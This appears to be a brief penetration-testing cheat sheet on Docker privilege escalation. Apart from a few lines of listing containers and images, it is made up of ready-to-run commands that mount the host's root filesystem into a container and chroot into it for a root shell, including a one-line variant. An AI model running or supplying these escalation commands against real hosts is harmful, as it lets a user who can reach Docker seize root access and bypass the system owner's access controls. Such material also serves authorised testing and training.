Docker privilege escalation
Collection of docker specific privesc vectors
Last updated
Collection of docker specific privesc vectors
Last updated
[1]List active processes
docker ps -a
[2]List docker images
docker images
[3]Easy privesc
c723nbsdf (this is the IMAGE ID of the docker pod)
docker run -v /:/mnt/r3dcl1ff -ti c723nbsdf /bin/sh
[4] Privesc with docker bash ID
a)docker images
If you find a container running bash you can mount your own user
Example: use the docker IMAGE ID for bash 0980cb958276
b) docker run -v /:/mnt/r3dcl1ff -ti 0980cb958276
change directory into r3dcl1ff and gain root access
[5]One liner to gain root
docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash